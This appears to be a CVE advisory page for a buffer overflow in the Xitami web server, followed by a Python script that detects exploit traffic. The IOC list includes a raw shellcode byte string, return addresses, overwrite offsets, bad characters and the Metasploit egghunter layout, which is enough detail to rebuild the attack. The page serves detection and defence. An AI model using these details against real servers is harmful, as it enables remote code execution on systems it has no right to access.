CVE-2007-5067
published 2007-09-24


Priority: P2 (60) · Severity: high · CVSS 2.0 base score: 7.5
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
Exploit: public exploit available
EPSS: 73.24% (99.4th percentile)
Multiple buffer overflows in iMatix Xitami Web Server 2.5c2 allow remote attackers to execute arbitrary code via a long If-Modified-Since header to (1) xigui32.exe or (2) xitami.exe.

Affected (1 range)

Vendor: imatix · Product: xitami · Version range: (not listed) · Fixed in: (not listed)

Detection & IOCs (extracted from sources)

process: xigui32.exe
process: xitami.exe
command: GET / HTTP/1.1 · Host: <host> · If-Modified-Since: Evil, <payload>
other: 0x7CA76981 (jmp esp, shell32.dll, Windows XP SP2 Polish)
other: 0x0044ceff (ret, xigui32.exe)
other: 0x0047c1f2 (ret, xitami.exe)
bytes: \x6a\x22\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x8d\x6c\xf6\xb2\x83\xeb\xfc\xe2\xf4\x71\x84\xb2\xb2\x8d\x6c\x7d\xf7\xb1\xe7\x8a\xb7\xf5\x6d\x19\x39\xc2\x74\x7d\xed\xad\x6d\x1d\xfb\x06\x58\x7d\xb3\x63\x5d\x36\x2b\x21\xe8\x36\xc6\x8a\xad\x3c\xbf\x8c\xae\x1d\x46\xb6\x38\xd2\xb6\xf8\x89\x7d\xed\xa9\x6d\x1d\xd4\x06\x60\xbd\x39\xd2\x70\xf7\x59\x06\x70\x7d\xb3\x66\xe5\xaa\x96\x89\xaf\xc7\x72\xe9\xe7\xb6\x82\x08\xac\x8e\xbe\x06\x2c\xfa\x39\xfd\x70\x5b\x39\xe5\x64\x1d\xbb\x06\xec\x46\xb2\x8d\x6c\x7d\xda\xb1\x33\xc7\x44\xed\x3a\x7f\x4a\x0e\xac\x8d\xe2\xe5\x9c\x7c\xb6\xd2\x04\x6e\x4c\x07\x62\xa1\x4d\x6a\x0f\x97\xde\xee\x6c\xf6\xb2
  • Detect HTTP requests whose If-Modified-Since header value begins with 'Evil, ' followed by a long string; this is the exact header format the exploit uses. A legitimate value is an HTTP date of about 29 bytes, so the length of the value is a usable signal on its own, and the 'Evil, ' marker is trivial for an attacker to change.
  • For xigui32.exe, the saved return address is overwritten at bytes 72 to 75 of the If-Modified-Since payload (72 bytes of padding followed by the 4-byte return address, 76 bytes in total).
  • For xitami.exe, the saved return address is overwritten at offset 104 of the If-Modified-Since payload.
  • The Metasploit module uses the egghunter technique: the small hunter stub runs from the overflowed buffer and searches memory for the egg (the tag followed by the real payload), which the module places in the Host header. Detect requests whose Host header is far longer than a hostname, or contains bytes that cannot occur in one, alongside an oversized If-Modified-Since header.
  • Fingerprint the vulnerable server by checking for 'Xitami' in the Server header of the response to GET / HTTP/1.1.
  • Bad characters for payload delivery are the null byte, newline and carriage return (\x00\x0a\x0d). CR and LF end the header line and a null byte is the usual string terminator, so a working payload contains none of them; a long If-Modified-Since value that does contain a null byte is more likely a broken attempt than a working exploit. Note that the xigui32.exe and xitami.exe return addresses (0x0044ceff, 0x0047c1f2) have 0x00 as their high byte, which lands last in little-endian memory.
  • The jmp esp address (0x7CA76981 in shell32.dll) is specific to Windows XP SP2 Polish; the Metasploit module instead returns into xigui32.exe (0x0044ceff) and xitami.exe (0x0047c1f2) themselves, which makes it independent of the OS version and locale.
  • The Metasploit module targets Windows only (tested on w2ksp0, w2ksp4, xpsp0 and xpsp2 en) and uses EXITFUNC=process.
  • Payload space is limited to 700 bytes, which is why the Metasploit module uses the egghunter technique rather than embedding the shellcode directly in the overflow buffer.
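The detection points above, exercised in code. This is an added example written for this page, not the Metasploit module's code and not something cvebase ships: it parses raw HTTP requests, applies the 'Evil, ' marker, the value-length, the Host-header egg and the return-address-at-offset checks, and runs them over constructed sample requests (the exploit-shaped ones carry placeholder bytes, no shellcode). The offsets 72 and 104 and the three addresses are taken from the IOC list; counting the offsets from the first byte after 'Evil, ', checking the XP SP2 Polish jmp esp address at the same offsets, and placing a stand-in for the egghunter stub inside the padding are this example's assumptions.

```python
"""Detection logic for CVE-2007-5067 exploit traffic, run over constructed
sample requests. Added example: not the Metasploit module's code and not a
cvebase artifact. Counting offsets from the byte after "Evil, " is assumed."""
import re
import struct

# Return-address offset in the If-Modified-Since payload and the Metasploit
# module's in-binary return address, per the IOC list above.
TARGETS = {
    "xigui32.exe": {"offset": 72, "ret": 0x0044CEFF},
    "xitami.exe": {"offset": 104, "ret": 0x0047C1F2},
}
JMP_ESP_XP_SP2_PL = 0x7CA76981  # shell32.dll jmp esp, Windows XP SP2 Polish only
BAD_CHARS = {0x00, 0x0A, 0x0D}
MAX_SANE_IMS_LEN = 64  # an HTTP date is 29 bytes
HOSTNAME_RE = re.compile(rb"^[A-Za-z0-9.\-\[\]:]+$")

def parse_head(raw: bytes):
    """Split an HTTP/1.x message head into (first line, {lower name: value}).
    Values stay bytes so shellcode is not mangled by text decoding."""
    lines = raw.split(b"\r\n\r\n", 1)[0].split(b"\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers

def analyze_request(raw: bytes) -> dict:
    """Return {'verdict': 'clean'|'suspicious'|'exploit', 'target', 'reasons'}."""
    _, headers = parse_head(raw)
    ims = headers.get(b"if-modified-since", b"")
    host = headers.get(b"host", b"")
    reasons, target = [], None
    if ims.startswith(b"Evil, "):
        reasons.append("If-Modified-Since starts with 'Evil, ' (Metasploit marker)")
    if len(ims) > MAX_SANE_IMS_LEN:
        reasons.append(f"If-Modified-Since is {len(ims)} bytes; a date is 29")
    # The egg rides in Host, which in real traffic is a short hostname[:port].
    if host and (len(host) > 253 or not HOSTNAME_RE.match(host)):
        reasons.append("Host is not a hostname (possible egg tag + payload)")
    payload = ims[6:] if ims.startswith(b"Evil, ") else ims
    for name, t in TARGETS.items():
        off = t["offset"]
        if len(payload) >= off + 4:
            (addr,) = struct.unpack("<I", payload[off:off + 4])
            if addr == t["ret"]:
                target = name
                reasons.append(f"{name} return address 0x{addr:08x} at offset {off}")
            elif addr == JMP_ESP_XP_SP2_PL:  # same offset for the PL address: assumption
                target = f"{name} (XP SP2 PL jmp esp)"
                reasons.append(f"shell32.dll jmp esp 0x{addr:08x} at offset {off}")
    # CR/LF end the header line and a null ends the copied string, so none
    # belongs in the padding or the egg. The in-binary return addresses end
    # in 0x00 in memory (little-endian), so that null is expected and skipped.
    padding = payload[:TARGETS[target]["offset"]] if target in TARGETS else payload
    if any(b in BAD_CHARS for b in padding + host):
        reasons.append("bad character in padding or egg; likely a broken attempt")
    verdict = "exploit" if target else "suspicious" if reasons else "clean"
    return {"verdict": verdict, "target": target, "reasons": reasons}

def is_xitami(response: bytes) -> bool:
    """Banner fingerprint: 'Xitami' in the Server header of the GET / reply."""
    _, headers = parse_head(response)
    return b"xitami" in headers.get(b"server", b"").lower()

def build_exploit_shaped_request(target: str) -> bytes:
    """Constructed request with the layout the IOC list describes: padding, the
    return address at the documented offset, a placeholder egg (tag twice, then
    payload) in Host. The stub stand-in inside the padding is an assumption."""
    t = TARGETS[target]
    stub = b"\x90" * 32  # stands in for the egghunter; no real shellcode here
    payload = stub + b"A" * (t["offset"] - len(stub)) + struct.pack("<I", t["ret"])
    egg = b"EGG!" * 2 + b"\xcc" * 300  # placeholder tag and placeholder payload
    return (b"GET / HTTP/1.1\r\nHost: " + egg + b"\r\n"
            b"If-Modified-Since: Evil, " + payload + b"\r\n\r\n")

SAMPLES = {  # all constructed for this example
    "benign": (b"GET / HTTP/1.1\r\nHost: www.example.com\r\n"
               b"If-Modified-Since: Sat, 29 Oct 1994 19:43:31 GMT\r\n\r\n"),
    "xigui32": build_exploit_shaped_request("xigui32.exe"),
    "xitami": build_exploit_shaped_request("xitami.exe"),
    "unknown_ret": (b"GET / HTTP/1.1\r\nHost: www.example.com\r\n"
                    b"If-Modified-Since: Evil, " + b"A" * 200 + b"\r\n\r\n"),
}
XITAMI_BANNER = b"HTTP/1.1 200 OK\r\nServer: Xitami\r\nContent-Type: text/html\r\n\r\n"

def verdicts() -> dict:
    """Verdict per sample: benign clean, both layouts exploit, unknown suspicious."""
    return {name: analyze_request(raw)["verdict"] for name, raw in SAMPLES.items()}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        r = analyze_request(raw)
        print(f"{name:12s} {r['verdict']:10s} target={r['target']} {r['reasons']}")
    print("banner looks like Xitami:", is_xitami(XITAMI_BANNER))
```

The 'Evil, ' string is the weakest of these signals, since any rewrite of the exploit can drop it; the length of the If-Modified-Since value and a Host value that is not a hostname survive such changes, and matching a known return address at the documented offset is what lets the alert name the target binary rather than just flag an anomaly.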